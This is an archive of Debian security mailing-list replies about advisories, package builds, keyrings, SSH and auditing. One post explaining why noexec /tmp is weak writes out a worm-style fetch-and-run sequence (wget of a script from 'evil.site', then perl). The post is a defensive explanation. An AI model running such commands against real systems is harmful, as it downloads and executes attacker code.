/usr/sbin/dansguardian > 121 24599 0.0 22.4 123716 115920 ? SN 08:22 0:00 > /usr/sbin/dansguardian > 121 24600 0.0 22.4 123748 116052 ? SN 08:22 0:00 > /usr/sbin/dansguardian > 121 29196 0.0 22.5 153460 116680 ? SN 17:18 0:02 > /usr/sbin/dansguardian > 121 29197 0.0 22.5 130292 116332 ? SN 17:18 0:00 > /usr/sbin/dansguardian > 121 29198 0.0 22.4 127920 116224 ? SN 17:18 0:00 > /usr/sbin/dansguardian > 121 29199 0.0 22.4 124280 116152 ? SN 17:18 0:00 > /usr/sbin/dansguardian > ^ > > look here, ps shows UID , not username. > > It's normal? > of course uid=121(dansguardian) gid=114(dansguardian) > gruppi=114(dansguardian) > > thanks > > LN > > > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1465-1] New apt-listchanges packages fix arbitrary code execution
On Thu Jan 17, 2008 at 16:35:47 +0100, Philipp Kern wrote: > Still that breaks because os is not imported. Please fix. Quickly. Done. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1448-1] New eggdrop packages fix execution of arbitrary code
On Sat Jan 05, 2008 at 15:11:22 +, Steve Kemp wrote: > - > Debian Security Advisory DSA-1448-1 [EMAIL PROTECTED] > http://www.debian.org/security/ Steve Kemp > January 05, 2008 http://www.debian.org/security/faq > - Apologies for sending this mail out twice. Steve -- pgpaHHCCiWhkf.pgp Description: PGP signature
Re: ping22: can not kill this process
On Fri Jan 04, 2008 at 06:04:50 -0200, Felipe Figueiredo wrote: > Anybody has a clue as to why was this default choosen, and not the safest one? Too many broken PHP applications? Anyway please see /usr/share/doc/php4-common/examples/ for different examples. (Or /usr/share/doc/php5-common/examples). Steve -- http://www.steve.org.uk/ pgpiQG2VvWmON.pgp Description: PGP signature
Re: [SECURITY] [DSA 1422-1] New e2fsprogs packages fix arbitrary code execution
On Fri Dec 07, 2007 at 18:41:35 +0100, Nico Golde wrote: > What about those, are they unimportant? > They are still present in the etch code. I stumbled > upon them while preparing a testing-security upload. Uknown. I used the patch provided by Theodore Tso, which he is/was planning on using for Sid/Ubuntu. If there are missing bits then we'll need to reissue the update, but right now I believed the patch was as complete as it needed to be. > Sorry, this mail was originally only addressed to Steve but > since I also got this mail through the debian-security list > it ended up here now :) Fair enough. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1422-1] New e2fsprogs packages fix arbitrary code execution
On Fri Dec 07, 2007 at 09:46:21 -0500, Juan Gallego wrote: > | For the stable distribution (etch), this problem has been fixed in version > | 1.39+1.40-WIP-2006.11.14+dfsg-2etch1. > > | For the unstable distribution (sid), this problem will be fixed shortly. > is sarge affected by this vulnerability? or has sarge been archived and i > missed the announcement? Sarge is affected, but I don't yet have a working patch for that. There should be an update shortly, but this is pretty low-risk and it seemed sensible to release now, rather than waiting. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: UNS: Re: [SECURITY] [DSA 1409-2] New samba packages fix several vulnerabilities
On Tue Nov 27, 2007 at 12:00:05 +1300, Ewen McNeill wrote: > In message <[EMAIL PROTECTED]>, Steve Kemp writes: > >Package: samba > >Vulnerability : several > >Problem type : remote > >Debian-specific: no > >CVE Id(s) : CVE-2007-4572, CVE-2007-5398 > >[...] > >For the stable distribution (etch), these problems have been fixed in > >version 3.0.24-6etch7. > > There doesn't appear to be a i386 package for Samba version > 3.0.24-6etch7 on any of the security.debian.org servers. Only a > 3.0.24-6etch6 package. AMD64 and most other architectures seem to have > 3.0.24-6etch7 and not 3.0.24-6etch6 packages. > According to the change log this means that one regression is missing > in the i386 packages (6etch6): That is correct. I've build a package now, and will be uploading shortly. In the meantime you can find it here: http://people.debian.org/~skx/samba/ I'm not entirely sure whether this fixes all known regressions there seem to be mixed reports, but it is the best we have and the most current elsewhere. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Firewall with woody
On Wed Oct 17, 2007 at 11:05:58 -0300, Jorge Escudero wrote: > I have the Firewall with woody and I never had got any security problem. > Is it risky to still using this version? Yes. There have been no security updates released for Woody in over a year, and that means there are liable to be security-relevant bugs present in your host(s). > Do I have to upgrade the version any time a new one is release? You don't need to. We can't force you. But you should strongly consider the benefits of running a stable supported version of Debian which receives security fixes. Steve -- # Commercial Debian GNU/Linux Support http://www.linux-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1379-1] New quagga packages fix denial of service
On Thu Oct 04, 2007 at 09:49:27 +0200, Etienne Favey wrote: > In what respect is the quagga problem related to the openssl problem, > that it gets the same DSA ID number? It was a mistake, the number was reused by accident. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass
On Fri Sep 21, 2007 at 19:18:38 +0300, Riku Valli wrote: > fetchmailconf have similar problem too. That should be fixed now. I'm just going to send out the mail ... Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass
On Fri Sep 21, 2007 at 16:48:34 +0100, Adam D. Barratt wrote: > I'm guessing the people reporting problems are i386 users. Yeah, that seems to be the problem. Thanks for being explicit about it though :) > kdebase is arch:all and therefore installable on i386. kappfinder isn't > and there aren't any i386 binary packages for it available. Noah has kindly volunteered to build complete packages for i386, so I'd expect this situation to be resolved in the next few hours. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass
On Fri Sep 21, 2007 at 11:45:37 -0400, Noah Meyerhans wrote: > Check i386. The security archive does not seem to have a complete set > of i386 binary packages... Stupid buildds .. I'll find a spare i386 machine and build for that over the weekend all being well. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1376-1]: missing dependencies result in removal of KDE
On Fri Sep 21, 2007 at 17:06:32 +0200, Georg Mainik wrote: > there are missing dependencies for this new version of kdebase. People > running > cron-apt with authomatic installation will get KDE completely removed! > > I already wrote to Steve Kemp. Who else should be informed? All the dependencies are there: http://security.debian.org/pool/updates/main/k/kdebase/ I just replied to the previous message sayign I wasn't sure what was wrong, if somebody can tell me I'm happy to take a look. As for who to tell, either this list or [EMAIL PROTECTED] is a good place. Still I'm certainly aware of a potential problem now. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass
On Fri Sep 21, 2007 at 18:01:10 +0300, Riku Valli wrote: > >For the stable distribution (etch), this problem has been fixed in version > >4:3.5.5a.dfsg.1-6etch1. > > > > > > It seems at kdebase and fetchmailconf depencies are broken. I don't see what the source of this is. > kdebase: Depends: kappfinder (>= 4:3.5.5a.dfsg.1-6etch1) but > 4:3.5.5a.dfsg.1-6 is installed. kappfinder is a binary coming from the kdebase package. > Depends: kate (>= 4:3.5.5a.dfsg.1-6etch1) but 4:3.5.5a.dfsg.1-6 is in > stalled. ditto. Unless I'm being dense the kdebase package provides all the correct versions to satisfy itself: eg. kappfinder_3.5.5a.dfsg.1-6etch1_amd64.deb kate_3.5.5a.dfsg.1-6etch1_amd64.deb (Same thing for fetchmail/fetchmailconf.) Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [DSA 1360-1] New rsync packages fix arbitrary code execution
On Tue Aug 28, 2007 at 15:24:24 -0400, Simon Valiquette wrote: > > Stable updates are available for alpha, amd64, arm, hppa, i386, > > ia64, mips, mipsel, powerpc, s390 and sparc. > > > > There is no updated packages for Debian Etch PowerPC, contrarily > to what is stated on the previous line. > Is there again a problem with the build host or something? That seems to be correct. What was released was all that was available. I should have updated that line - my belief was that it was automatically generated in the DSA-releasing process, so that I didn't need to. I'll check for the future to make sure that I only claim to provide those archs which have built. > Steve -- pgpcjuOKwUjAG.pgp Description: PGP signature
Re: security.d.o packages for etch built on sarge
On Sun Jul 01, 2007 at 00:59:24 +0200, Karol Lewandowski wrote: > On Mon, Jun 25, 2007 at 02:56:07PM +0200, karol wrote: > > > It looks like etch's security updates were built on sarge. python2.3 > > isn't available in etch making ekg's security update uninstallable. > > I would be _very_ happy to hear _any_ comment on that. I'll probably > ask debian-devel if I won't get any answer in next few days. Etch security updates *should* be built upon Etch. Sarge updates *should* be built upon Sarge. Anything else is liable to break and is a bug which should be fixed with an update. I've checked the build-logs I've got access to (all except i386) and they seem fine. is it just i386 you see this behavior upon? Do other people see this too, or is it a potentially broken system you're installing upon (I have to ask; some people still have mixed sources.lists files..) Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: an issue with recent security advisories
On Mon Jun 18, 2007 at 19:49:28 +1000, Tomasz Ciolek wrote: > been uploaded to the repositories and added to Releases and Packages > files? Yes. > Whats the point of making a security advisory if the packages are NOT > AVAILABLE in mirrors and repositories > > here is my sources.list... maybe I have some misconfiguraion ? You're missing: deb http://security.debian.org/ etch/updates main contrib non-free We suggest people never mirror the security archive, to avoid problems, and this is the place where security updates will be uploaded to. The sources lists you have would only receive new updates for point releases of Etch. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1266-1] New gnupg packages fix signature forgery
On Wed, Mar 14, 2007 at 11:43:40AM +0100, Frank Küster wrote: > Moritz Muehlenhoff <[EMAIL PROTECTED]> wrote: > > For the upcoming stable distribution (etch) these problems have been > > fixed in version 1.4.6-2. > However, etch still has 1.4.6-1, and no freeze exception has been > requested. But it has been granted. $ grep-excuses gnupg gnupg (1.4.6-1 to 1.4.6-2) Maintainer: James Troup Too young, only 1 of 5 days old Ignoring request to block package by freeze, due to unblock request by he Not considered $ We don't expect maintainers to request unblocks for RC bugfixes (in fact, I prefer they don't, it's just extra mail to reply to). > I'm not sure about the policy for security updates in etch, but it doesn't > seem proper to announce the availability in a DSA if it's not yet true... Hopefully, the fact that the security team made this statement means they were aware 1.4.6-2 was a candidate for inclusion in etch. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. [EMAIL PROTECTED] http://www.debian.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Bug#401969: please build using hunspell
On Fri, Dec 08, 2006 at 10:32:50PM +0100, Mike Hommey wrote: > How does the security team feel about having to rebuild iceape, > iceweasel, icedove (you forgot to file a bug on icedove), OOo and enchant > if there happens to be a security bug in hunspell ? In general having multiple packages needing a rebuild for a single security fix is a problem, and not something we'd like to have to deal with. (For a specific example think of the pdf/gs updates we had to make earlier in the year/last year. Lots of different programs with very similar code which didn't always get spotted at the same time.) A more recent example would be the links + elinks updates. Links was updated first then we updated elinks afterwards when we learnt there was shared code .. (Obvious in retrospect, but if there are a lot of packages which would require a rebuild keeping track of all of them can be difficult; especially if we don't know about it in advance.) Steve -- signature.asc Description: Digital signature
Re: Mass update deployment strategy
On Mon, Nov 27, 2006 at 08:37:42PM +0100, mario wrote: > i am responsible for 10 (ubuntu and debian) installations so far. > I have installed apticron which informs me about updates frequently. > Actually, its that often that i sometimes need to invest 1h a day just > doing updates. Given the choice I'd much prefer identical distributions, even with a little pain. Since things differ between Ubuntu & Debian (and Redhat/SuSE/etc). Having two or more security update schedules and two lots of testing is more painful. > Do you have a strategy or anything to automate this task a little more? cfengine. I'm interested in puppet, but it wasn't (isn't yet?) stable at the time I started automation on a decent sized farm. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ signature.asc Description: Digital signature
Re: [TGSysadmin] [SECURITY] [DSA 1155-1] New sendmail packages fix denial of service
On Thu, Aug 24, 2006 at 09:17:06AM -0400, Paul Nesbit wrote: > On Thu, Aug 24, 2006 at 08:23:59AM +0200, Martin Schulze <[EMAIL PROTECTED]> > wrote: > > [...] > > a MIME conversion routine in sendmail, a powerful, efficient, and > > scalable mail transport agent, could be tricked > > [...] > > Funny, bias in errata reports. All DSA notices have a description like that. These descriptions come from the package itself. eg: [EMAIL PROTECTED]:~$ apt-cache show sendmail | grep Desc Description: powerful, efficient, and scalable Mail Transport Agent Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/
Re: editing "new" known_hosts files
On Sat, Jul 22, 2006 at 11:48:00PM +0200, LeVA wrote: > I have reinstalled a server of mine, and now I need to remove it's old > pubkey from my $HOME/.ssh/known_hosts, but it is in the "new" format, > so no hostnames which may indicate which pubkey belongs to which host. > How can I "decrypt" the known_hosts file? You can't decrypt them, but you can delete all entries for a given host with: ssh-keygen -R host.name See the manpage for ssh-keygen for details. (Search for "hash" to see the relevent options.) Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: BADSIG verifying s.d.o Release file
On Fri, Jun 30, 2006 at 10:33:55AM +0200, martin f krafft wrote: > also sprach Steve Kemp <[EMAIL PROTECTED]> [2006.06.30.1004 +0200]: > > This is a known issue, relating to some of the infrastructure > > changes. Hopefully it will be resolved shortly. > > Thanks Steve. Do you know why this was not publicised beforehand on > debian-security-announce or debian-announce? I think nobody thought of it to be honest, and people started to notice just around the time we did. (The problem here comes from the new "dak" software being used to handle the archive, and this is just a problem that hadn't been spotted since we've only just started releasing advisories with it.) Steve -- signature.asc Description: Digital signature
Re: BADSIG verifying s.d.o Release file
On Fri, Jun 30, 2006 at 09:15:42AM +0200, martin f krafft wrote: > I've been seeing this a bunch in the past few weeks. Just making > sure you know about it, and maybe someone knows what's going on: > > W: GPG error: http://security.debian.org stable/updates Release: The > following signatures were invalid: BADSIG 010908312D230C5F Debian > Archive Automatic Signing Key (2006) <[EMAIL PROTECTED]> This is a known issue, relating to some of the infrastructure changes. Hopefully it will be resolved shortly. Currently each of the release files are empty... Steve -- signature.asc Description: Digital signature
Re: Command history log for audit trail
On Thu, Jun 15, 2006 at 01:08:37PM -0700, [EMAIL PROTECTED] wrote: > I need to set up an audit trail for all commands run on machines. I > know that the auth.log records who logs in and when, and that each > user's .bash_history has a history of their commands. But is there some > other way to create a log for all commands run on a system? Use the 'snoopy' package, as described here: http://www.debian-administration.org/articles/88 Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Debian Kernel security status?
On Thu, Apr 20, 2006 at 04:18:28PM +0200, Jan Luehr wrote: > Btw. Why do a lot of DSAs care about oldstable, while kernel-updates avoid > woody? Because building kernels is hard for Sarge and very hard for Woody. I seem to recall Joey asking for volunteers to help work on kernels a good few months back ... DSAs for woody will probably cease soon as well. From memory we promised a year of support after the release of Sarge. Sarge was released early June, so that gives us the end of this month and then just May to continue with. Of course if it isn't too hard, or there is a lot of demand, it may be possible to continue supporting it for a little longer. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit signature.asc Description: Digital signature
Re: security issues with apache!
On Mon, Mar 13, 2006 at 09:02:13AM +0200, Enver ALTIN wrote: > If you have to leave some writable folders for Apache user, say, /tmp, > moving /tmp to another partition/filesystem and mounting it with > "noexec" option would prevent most harm /any/ PHP script can cause. Not true. Several of the receent exploit worms do the equivilent of this: cd /tmp wget http://evil.site/perl/script.pl perl /tmp/script.pl & Even if the /tmp partition is mounted noexec this will still work. (Although '/tmp/script.pl &' would fail.) Noexec can help in some situations, but blocking 'wget', 'perl' etc in requests via mod_security is a much more useful thing to do. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Another problem with gnupg
On Fri, Mar 10, 2006 at 09:42:00AM -0600, Michael Knoop wrote: > There is a new problem with the gnupg program and digital signatures. > > <http://lists.gnupg.org/pipermail/gnupg-announce/2006q1/000216.html> The original problem was fixed with DSA-978. This new, related, problem will be fixed shortly - new packages are already in the queue. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [gna-private] [SECURITY] [DSA 987-1] New tar packages fix arbitrary code execution
On Wed, Mar 08, 2006 at 09:41:39AM +0100, Mathieu Roy wrote: > > Package: tar > > Vulnerability : buffer overflow > > Problem-Type : local(remote) > > What does mean > local(remote) > > Does it means local... or remote? Local. But remote in the sense that you may receive a .tar file from a remote source. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: first A record of security.debian.org extremely slow
On Thu, Mar 02, 2006 at 10:36:16PM +0100, Marc Haber wrote: > How would you implement the automatism to trigger the update on the > incoming e-mail? procmail, matching on new mails to the debian-security-announce mailing list .. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: CVE-2006-0225, scponly shell command possible
On Wed, Feb 15, 2006 at 02:01:51PM +1100, Geoff Crompton wrote: > This bug has been closed for unstable (see bug 350964) with the 4.6 > upload, but will it be fixed for sarge? Please see DSA-969-1 released two days ago: http://www.us.debian.org/security/2006/dsa-969 Sarge is fixed. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Removing email addresses from gpg-key?
On Tue, Jan 24, 2006 at 01:54:24PM +, Jonathan McDowell wrote: > You want to revoke the uids (revuid) rather than deleting them; there's > no way you can delete them off other people's keyrings, or the > keyservers, so you mark them as deleted instead by revoking them. Thanks for that. Obvious once you said it too! I've revoked the obsolete email addresses and uploaded again now. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Removing email addresses from gpg-key?
I'm trying to remove a couple of obsolete email addresses from my GPG key. Using the "deluid" command available after running "gpg --edit-key" works successfully. But once I upload my modified key to various keyservers I see the identities be re-added by the keyserver at debian.org: After removing some identities: [EMAIL PROTECTED]:~$ gpg --list-key CD4C0D9D pub 1024D/CD4C0D9D 2002-05-29 uid Steve Kemp <[EMAIL PROTECTED]> uid Steve Kemp <[EMAIL PROTECTED]> uid Steve Kemp <[EMAIL PROTECTED]> sub 2048g/AC995563 2002-05-29 Now I upload the key to various servers. *time passes* Finally I refresh it: [EMAIL PROTECTED]:~$ gpg --keyserver keyring.debian.org --recv-keys CD4C0D9D gpg: requesting key CD4C0D9D from hkp server keyring.debian.org gpg: key CD4C0D9D: "Steve Kemp <[EMAIL PROTECTED]>" 2 new user IDs gpg: key CD4C0D9D: "Steve Kemp <[EMAIL PROTECTED]>" 23 new signatures gpg: Total number processed: 1 gpg: new user IDs: 2 gpg: new signatures: 23 Here we see "new user IDs:2" - and as this suggests the removed IDs are back! I dont want them anymore! What can I do in this case? Is it just a matter of being more patient after uploading the key. Or should I report a bug to the Debian keyring pseudo-package? Steve --
Re: [SECURITY] [DSA 945-1] New antiword packages fix insecure temporary file creation
On Tue, Jan 17, 2006 at 07:59:45PM +0100, Florian Weimer wrote: > AFAICS, this rule is quite reasonable, so I assume that this antiword > version is just a minor glitch. Correct? Yes. My fault entirely. It actually took me a while to see what was wrong there - usually I just add 'sargeN' to the string, but for some reason I've updated the minor too. Definitely something I'll be careful to avoid in the future. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 930-1] New smstools packages fix format string vulnerability
On Mon, Jan 09, 2006 at 02:32:18PM +0100, Thijs Kinkhorst wrote: > >For the unstable distribution the package will be updated shortly. > > > It's great to hear that unstable will be fixed soon, but why wasn't > there a grave bug filed against the package? If for some reason the > maintainer misses this DSA, it is lateron unknown that the version in > unstable is vulnerable and still needs to be fixed... A bug has been filed. If there is no action in a short space of time I'm happy to perform an NMU. Testing will get the fix shortly via the package migration, so it is only sid users who are at risk; and we don't offer explicit security support there. (Though obviously it should be fixed ASAP.) Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: hardening checkpoints
Le Mercredi, 21 Décembre 2005 12.40, Johannes Wiedersich a écrit : > steve wrote: > > Le Mardi, 20 Décembre 2005 16.18, Michelle Konzack a écrit : > >>But in ALL Internet Cafes I can use my own (selfmade) Debian Live-System > >>with my prefered Desktop. In all Internet Cafes i get an IP via DHCP. > > > > Wrong. I was in Milano (Italy) a few month ago, and I wanted to do > > exactly that. The person at the desk looked at me as if I were a Martien > > when I ask her if I could reboot the machine on my personnel Debian > > live-cd. First, she didn't understand what all that was about, and second > > she could'nt control my connection time, so she simply refused. Moreover, > > in Italy you have to give an ID (they do a photocopy of it; she couldn't > > tell me how long they keep it..) to be able to use a computer in an > > Internet Café (terrorism you know...). > > > > Sorry ;-) > > Wrong: in Europe you shouldn't mix Italy with France. right : you eat better in France than in Italy. No, being serious again, I read Michelle's post a bit to fast and I mixed things up. I don't know why, but I thought she was thinking of Europe in her post. > I don't know > anything about Italian or French internet cafes, but I would be really > surprised, if there would be anything similar in the way their > administration works. You're right, they don't, politics is now the difference, at least in Internet Cafés. > For Italy, no matter what you do or where you are, it is always a sure > bet, that the person behind the counter (hotel, airport, etc. etc. > internet cafe) won't allow anything 'unusual' without double and tripple > checking with his/her boss. .. who is rarely there. So Michelle's solution seems to be quite unrealistic. > This usually means that you have to insist and wait. I'm ok with waiting 5 minutes, but more is too much, especially when you're just looking for a theather's timetable and you're in a hurry (and the theather's phone is down. Own experience.) > (In Italy 'unusual' means 'slightly different from normal'). I'll let you the responsability of that definition ;-) > Short message: two countries in Europe (say Italy and France) are about > as different from each other than any European country is from say the US. I'm with you on that one. But living near France, I'm very much willing to go there and give it a try. Just for the sake of it. But, I don't know why, I feel that my live-cd won't be very much appreciated.. really too scary stuff, isn't it? > Johannes -- steve jabber : [EMAIL PROTECTED]
Re: hardening checkpoints
Le Mardi, 20 Décembre 2005 16.18, Michelle Konzack a écrit : > But in ALL Internet Cafes I can use my own (selfmade) Debian Live-System > with my prefered Desktop. In all Internet Cafes i get an IP via DHCP. Wrong. I was in Milano (Italy) a few month ago, and I wanted to do exactly that. The person at the desk looked at me as if I were a Martien when I ask her if I could reboot the machine on my personnel Debian live-cd. First, she didn't understand what all that was about, and second she could'nt control my connection time, so she simply refused. Moreover, in Italy you have to give an ID (they do a photocopy of it; she couldn't tell me how long they keep it..) to be able to use a computer in an Internet Café (terrorism you know...). Sorry ;-) > Greetings > Michelle Have a nice day -- steve jabber : [EMAIL PROTECTED]
Re: Restricting ssh access to internet but not to internal network
I would likely restrict access to ssh from external, if at all possible. I realize that this isn't always possible but it should be possible to at least narrow down access to certain IP ranges. For this particular problem I'm assuming there are two NICs in the computer, one with an IP in private space and the other with a public address? One idea is to bind two SSH daemons, one for each NIC. Place no AllowGroups restriction on the internal SSH daemon. This means that all users can connect internally. On the SSH daemon bound externally place the AllowGroups restriction to restrict access to members of that group. If there's only one NIC in the computer then you could still use two SSH daemons, just bind them to different ports. The internal port might be the standard tcp/22 whereas externally you would bind tcp/ or something. Then firewall off the access to port 22 from externally so that the internal-use daemon can't be accessed. Hope that helps. I'm sure others will have ideas too. Steve On Thu, Nov 24, 2005 at 10:14:11PM -0800, Patrick wrote: > I have an server running sshd on Sarge. I want all users to be able to > access the computer from within the internal network - but restrict > access from the internet (to users in a particular group). Can this be > achieved by combining the /etc/hosts.allow or /etc/hosts.deny files and > the AllowGroup (or AllowUsers) options in sshd configuration file. > > If so, how ? > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: What is a security bug?
On Wed, Nov 23, 2005 at 12:15:35PM +0100, Jasper Filon wrote: > Well, obviously it is not a _security_ bug, since it has nothing to do > with security. However, it is a bug, maybe even a critical one. I filed a couple of bugs on Mozilla relating to DOS attacks, crashing the browser on some badly formed input HTML. They were not treated as security bugs which suprised me at the time. Steve -- signature.asc Description: Digital signature
Re: PMASA-2005-6 when "register_globals = on"
On Tue, Nov 15, 2005 at 05:54:32PM +0100, Piotr Roszatycki wrote: > http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-6 reports > that sarge's phpmyadmin package has a security flaw which is occured only if > "register_globals = on" setting is used. > > This feature is disabled in Debian package by default so I doubt if this is > serious problem. I'd like to ask if I should prepare the new package for > sarge or not? I think an upload would be justified. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: What's going on with advisory for phpmyadmin?
On Fri, Oct 28, 2005 at 11:01:29AM -0500, John Goerzen wrote: > > > Could someone from the security team comment on what the problem is? > > > > The problem is that we receive a lot of reports, each of which may > > involve a significant amount of time to attend to. > > Well, that's a symptom. Isn't the root problem not enough people on the > team in this case? That is almost certainly the case, however adding more members is still not going to result in immediate updates. (Things like timezones, coordination, and other practicalities come into play with more members. Not to mention waiting for other vendors, upstream etc, is not something that will be helped by more members). Steve -- signature.asc Description: Digital signature
Re: What's going on with advisory for phpmyadmin?
On Fri, Oct 28, 2005 at 10:16:03AM -0500, John Goerzen wrote: > On Fri, Oct 28, 2005 at 04:42:31PM +0200, Piotr Roszatycki wrote: > > Why my report was ignored? I've reported the problem 3 days ago and I had > > no > > reply. > > This seems to be a very frequent problem going on for awhile now. > > Could someone from the security team comment on what the problem is? The problem is that we receive a lot of reports, each of which may involve a significant amount of time to attend to. New entries are pushed onto the stack almost daily. Whilst some are simple and can be dealt with easily some are more complex and obviously we cannot disclose them publically. If it is useful I could begin sending out a form response, something like "Yes we recieved your report, yes we will fix it, please have patience". However a useful response such as "Yes we've got your package report and we'll update an advisory after we've done openssh, mozilla, the kernel." is not going to happen. Even estimating an advisory date is going to be non-trivial. (NOTE: Package names above are chosen at random ...) Sometimes an issue will be responded to, fixed, and uploaded all in the same day. Sometimes it takes longer to: * Confirm the problme. * Produce a patch. * Communicate with the package maintainer to discover when the Sid version will be tested. * Communicate with other Linux distributions to make sure that the package can be updated by multiple distributions in a coordinated fashion. * Communicate with the upstream developers to let them know, if they don't so far. * Allocate and assign a unique ID for the issue. The best thing that you can do when reporting problems is: a) Be detailed. b) Ideally have a patch, or a pointer to one. c) Be patient. d) Don't file reports which are already in the BTS. e) Be patient. f) Be patient. All reports are read and responded to *in time*. Be patient. None of this is news. Steve -- signature.asc Description: Digital signature
Re: [SECURITY] [DSA 862-1] New Ruby 1.6 packages fix safety bypass
On Tue, Oct 11, 2005 at 09:32:57AM +0200, Wolfgang Jeltsch wrote: > Am Dienstag, 11. Oktober 2005 09:01 schrieb Martin Schulze: > > [...] > > > Package: ruby1.8 > > Ruby 1.6 or Ruby 1.8? Both. See the table: http://www.us.debian.org/security/2005/dsa-860 http://www.us.debian.org/security/2005/dsa-862 Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
security.debian.org - Infrastructure updates
Hi, Just a quick note to point people at this news annoucement: http://lists.debian.org/debian-news/debian-news-2005/msg00047.html Steve -- signature.asc Description: Digital signature
Re: ClamAV vulnerability
On Mon, Sep 26, 2005 at 05:36:27AM -0700, P PRABHU wrote: > Any fix for the latest ClamAV buffer overflow in the > file "upx.c" vulnerability. Currently .deb based > version is 0.84-2.sarge.2 . Is this version subject to > this vulnerability ?? If so any fix will be released A DSA is pending, and should be available shortly. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: security.debian.org timeouts
